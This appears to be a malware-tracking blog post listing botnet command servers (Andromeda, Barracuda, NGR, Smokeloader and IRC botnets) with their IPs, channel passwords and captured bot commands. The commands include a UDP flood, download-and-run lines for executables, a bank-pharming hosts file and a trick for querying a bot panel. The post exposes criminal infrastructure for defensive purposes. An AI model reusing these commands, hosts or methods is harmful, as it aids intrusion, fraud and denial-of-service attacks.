Resolved needlifechange.com to 91.223.82.153 Server: needlifechange.com Gate file: image.php Plugins: Formgrabber: needlifechange.com/formgrabber.pack Gate file: fg.php Rootkit: needlifechange.com/rootkit.pack Hosting info: http://whois.domaintools.com/91.223.82.153
178.18.19.105 (Aryan irc botnet hosted by United States United Fibermax Networks Bv)
Server: 178.18.19.105 Port: 8375 Channel: #Break# #Break# 102 [+smnt] Oper: * [Break] (Break@pimp): Break * [Break] ~#Break# * [Break] irc.Break.gov :cia.gov * [Break] is a Network Administrator * [Break] is available for help. * [Break] idle 00:08:52, signon: Fri Nov 16 00:22:20 * Break (Break@gov-E1CAB504.nycmny.fios.verizon.net) has joined #Break# Nick format: Break{VN-XP-x86}2221143 Hosting infos: http://whois.domaintools.com/178.18.19.105
techmanagement.info (Andromeda http botnet hosted by United Kingdom Pintwire)
Resolved techmanagement.info to 174.36.138.26 Andromeda Server: techmanagement.info Gate file: /image.php Plugins: Socks dl.dropbox.com/u/37821967/s.pack Hosting infos: http://whois.domaintools.com/176.31.208.106
178.18.19.153 (irc botnet hosted by United States United Fibermax Networks Bv)
Server: 178.18.19.153 Port: 6969 Channel: #iRoot Opers: Rogue, Boss Nick Format: [Break-BoT-XP-USA]935862 Usb spreading: [Break-BoT-XP-ARG]356431: [FeVeR-USB] Infected With a FeVeR F: Version command Rogue: @version [Break-BoT-XP-ESP]467870: ..:: iRooT Modded by Break: v1.0 -::.. UDP flood: Rogue @udp 199.101.48.142 80 0 25000 [Break-BoT-XP-ESP]467870: [UDP]: FeVeR Flooding 199.101.48.142, On TeH PoRT: 80, WiTH A MoFKN DeLaY Of:Read more...
tuntu.info (ngr irc botnet hosted by United States Miami Servergrove)
Resolved tuntu.info to 69.195.198.208 Server: tuntu.info Port: 5487 Channel: #zrl Channel password: filtro * Topic for #zrl is: !mdns http://freebookclubs.com/thumb/demo/host.txt !up hxxp://www.cesarfelipe.com.br//wp-content/themes/sakura/upd.exe EC62971A5CE3FE7DB74BBA3E5D1568D6 * Topic for #zrl set by dexter at Sun Nov 11 17:11:54 2012 host.txt www.bbvabancocontinental.com 38.109.219.132 bbvabancocontinental.com 38.109.219.132 www.bbvacontinental.com 38.109.219.132 bbvacontinental.com 38.109.219.132 www.bbvacontinental.pe 38.109.219.132 bbvacontinental.pe 38.109.219.132 148.244.45.125 38.109.219.132 www.bn.com.pe 38.109.219.132 bn.com.pe 38.109.219.132Read more...
Autoit Survey Winlocker
I found this while looking at the files that the barracuda http bots were downloading. First screen CPA gateway The only survey leads to a parked domain, my computer is locked forever The winlocker is coded in autoit, so I decompiled it to an autoit script here: http://pastebin.com/ayK5QsVD The important parts are the three htmlRead more...
Multiple Barracuda http nets (hosted by Russian Federation Moscow Pallada Web Service Llc)
Urls are: r00kiehttp.no-ip.info rabbit801.no-ip.org drhawks.no-ip.org pooostealer.no-ip.org To see what command is currently being sent, just add this to the end of the domain: /bot.php?ip=0.0.0.0&os=Microsoft%20Windows%20xp&name=FBI-PC&id=Federal-Agent-1.3.3.7 The command will show up in plain text on the page. Hosting infos: http://whois.domaintools.com/37.0.123.113 One other on different hosting: watchshopper.no-ip.org/backup/ Hosting infos: http://whois.domaintools.com/91.217.178.192
aminakoyim.co.cc (ngr irc botnet hosted by Sweden Stockholm Portlane Networks Ab)
Resolved aminakoyim.co.cc to 46.246.93.77 Server: aminakoyim.co.cc Port: 6667 Password: timu Channel: #NGR * Topic for #NGR is: !vs www.pvpserver.gen.tr 1 | !dl hxxp://www.depac.ws/jar/h.exe * Topic for #NGR set by infeCTeD at Sun Nov 04 13:32:54 2012 All users are auto joined to #debug# on connect * Topic for #debug# is: !dl hxxp://www.depac.ws/jar/t.exe c:/t.exe 1 *Read more...
cdn.barracudasec.com (Barracuda http bot hosted by Seychelles Victoria Business Dialogue Ltd)
Resolved cdn.barracudasec.com to 91.217.178.192 Server: cdn.barracudasec.com Gate file: /bot.php http://cdn.barracudasec.com/images/logo.png Bot Get requests look like this: /bot.php?ip=0.0.0.0&os=Microsoft Windows xp&name=FBI-PC&id=Federal agent-barracuda version Bots will get ip from checkip.dyndns.com or api.wipmania.com Hint: $ip= $REMOTE_ADDR Hosting infos: http://whois.domaintools.com/91.217.178.192 Another panel is located at xn--y0h.co.cc. This one is on a different host. http://xn--y0h.co.cc/images/logo.png Hosting infos: http://whois.domaintools.com/37.0.124.66
diablothreecracked.in (Smokeloader hosted by Luxembourg Luxembourg Root Sa)
Resolved diablothreecracked.in to 94.242.199.145 Zain got himself a new smokeloader. Server: diablothreecracked.in Gate file: /index.php He left the zip containing the panel and original exe up on the host: hxxp://diablothreecracked.in/smoke.zip Here it is if he notices and takes it down hxxp://diablothreecracked.in/install.php is still up as well. Hosting infos: http://whois.domaintools.com/94.242.199.145